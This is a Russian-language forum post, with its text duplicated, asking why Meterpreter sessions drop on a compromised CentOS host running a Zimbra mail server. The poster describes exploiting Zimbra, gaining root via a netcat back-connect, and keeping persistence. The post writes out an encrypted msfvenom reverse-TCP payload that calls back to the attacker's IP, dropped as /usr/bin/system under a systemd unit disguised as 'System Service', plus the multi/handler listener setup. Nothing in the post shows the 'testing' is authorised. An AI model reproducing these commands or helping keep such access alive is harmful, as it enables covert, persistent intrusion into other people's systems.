Здравствуйте.Возник такая проблема с meterpreter Опишу ситуацию :
Тестирую некую сеть . В одном из машин нашел уязвимый почтовый сервер Zimbra.Уязвимая машина стоит за nat/firewall а у меня машина стоит за роутером. Использовав эксплоит я сделал backconnect к своей машине с помощью nc. Успешно подключился. После этого получил привилегии root. Но для чтобы тестировать сеть мне нужно на этой взломанной машине закрепиться.Для этой цели я сделал следующее : Я сгенерировал payload в metasploit с помощью команды :
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=мой внешний ip LPORT=46852 --encrypt aes256 --encrypt-key encryptkey -f elf > /root/Desktop/system
И после этого загрузил этот payload на машину.Положил payload в папку /usr/bin/ . Создал свой системный сервис с запуском payload-а каждые пят минут проделав следующее :
1)Создал файл system.service в директории /etc/systemd/system/ с таким содержанием :
[Unit]
Description=System Service
[Service]
ExecStart=/usr/bin/system
Restart=always
RestartSec=300
[Install]
WantedBy=default.target
2) Набрал следующее в терминале :
systemctl enable system.service
systemctl start system.service
Набрав systemctl --list=service и увидел что мой сервис успешно стартанул. После этого я оборвал соединение с nc. Набрал в Metasploit следующее :
use exploit/multi/handler
set payload payload/linux/x64/meterpreter_reverse_tcp
set lhost мой внутренний ip (192.168.0.102 в Kali)
set lport 46852
set ReverseListenerBindAddress 192.168.0.102
run
Мой payload успешно подключился к моей машине.Но после некоторой работы на уязвимой машине или некоторого времени связь обрывается и сообщение : Meterpreter session died.Это происходит редко но все таки происходить. Ну я в этом случае открываю прослушку заново с параметрами выше при этом перезапустив и metasploit заново. На этот раз сообщение : Meterpreter session is not valid session and will closed.
OC уязвимый машины :CentOS 7.9.2009 (Linux 3.10.0-1160.6.1.el7.x86_64)
Так вот. Вопросы :
1) Почему обрывается связь ? Я посмотрел в опциях meterpreter там стоит SessionExpirationTimeout с значением 604800 . Из-за чего может произойти обрыв ?
2) Почему появляется ошибка "Meterpreter session is not valid session and will closed. " и сессия не устанавливаеться ? Что я сделал неправильно ?
Интересно мне вот что : После ошибки "Meterpreter session is not valid session and will closed. " я заново эксплуатирую ошибку в zimbra ,повышаю права , убиваю процесс payload-a. И после этого payload успешно подключаеться к моей машине.
Что нужно сделать в данной ситуации ? Спасибо за ответы.
Тестирую некую сеть . В одном из машин нашел уязвимый почтовый сервер Zimbra.Уязвимая машина стоит за nat/firewall а у меня машина стоит за роутером. Использовав эксплоит я сделал backconnect к своей машине с помощью nc. Успешно подключился. После этого получил привилегии root. Но для чтобы тестировать сеть мне нужно на этой взломанной машине закрепиться.Для этой цели я сделал следующее : Я сгенерировал payload в metasploit с помощью команды :
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=мой внешний ip LPORT=46852 --encrypt aes256 --encrypt-key encryptkey -f elf > /root/Desktop/system
И после этого загрузил этот payload на машину.Положил payload в папку /usr/bin/ . Создал свой системный сервис с запуском payload-а каждые пят минут проделав следующее :
1)Создал файл system.service в директории /etc/systemd/system/ с таким содержанием :
[Unit]
Description=System Service
[Service]
ExecStart=/usr/bin/system
Restart=always
RestartSec=300
[Install]
WantedBy=default.target
2) Набрал следующее в терминале :
systemctl enable system.service
systemctl start system.service
Набрав systemctl --list=service и увидел что мой сервис успешно стартанул. После этого я оборвал соединение с nc. Набрал в Metasploit следующее :
use exploit/multi/handler
set payload payload/linux/x64/meterpreter_reverse_tcp
set lhost мой внутренний ip (192.168.0.102 в Kali)
set lport 46852
set ReverseListenerBindAddress 192.168.0.102
run
Мой payload успешно подключился к моей машине.Но после некоторой работы на уязвимой машине или некоторого времени связь обрывается и сообщение : Meterpreter session died.Это происходит редко но все таки происходить. Ну я в этом случае открываю прослушку заново с параметрами выше при этом перезапустив и metasploit заново. На этот раз сообщение : Meterpreter session is not valid session and will closed.
OC уязвимый машины :CentOS 7.9.2009 (Linux 3.10.0-1160.6.1.el7.x86_64)
Так вот. Вопросы :
1) Почему обрывается связь ? Я посмотрел в опциях meterpreter там стоит SessionExpirationTimeout с значением 604800 . Из-за чего может произойти обрыв ?
2) Почему появляется ошибка "Meterpreter session is not valid session and will closed. " и сессия не устанавливаеться ? Что я сделал неправильно ?
Интересно мне вот что : После ошибки "Meterpreter session is not valid session and will closed. " я заново эксплуатирую ошибку в zimbra ,повышаю права , убиваю процесс payload-a. И после этого payload успешно подключаеться к моей машине.
Что нужно сделать в данной ситуации ? Спасибо за ответы.